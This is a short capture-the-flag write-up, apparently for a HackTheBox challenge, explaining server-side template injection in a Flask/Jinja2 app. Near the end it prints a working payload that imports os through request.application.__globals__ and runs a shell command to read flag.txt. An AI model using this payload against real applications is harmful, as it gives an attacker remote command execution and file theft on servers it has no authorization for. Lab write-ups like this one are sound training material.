Challenge Description
Can you exploit this simple mistake?
Once the Templated instance has been initiated, we can visit the given <IP>:<PORT>
combination to access the challenge.
Visiting http://<IP>:<PORT>/
we get this output:
Site still under construction
Proudly powered by Flask/Jinja2
It’s a Flask app using Jinja as a template engine.
Flask/Jinja2 SSTI
We check to see if the app is vulnerable to SSTI:
Error 404
The page '49' could not be found
It is.
Now we can traverse up the request library in Flask to import the os
library to have shell access:
Error 404
The page 'bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var ' could not be found
We found the flag location. Now we can simply cat
it out:
http://<IP>:<PORT>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
Error 404
The page 'HTB{t3m***********************************nk!} ' could not be found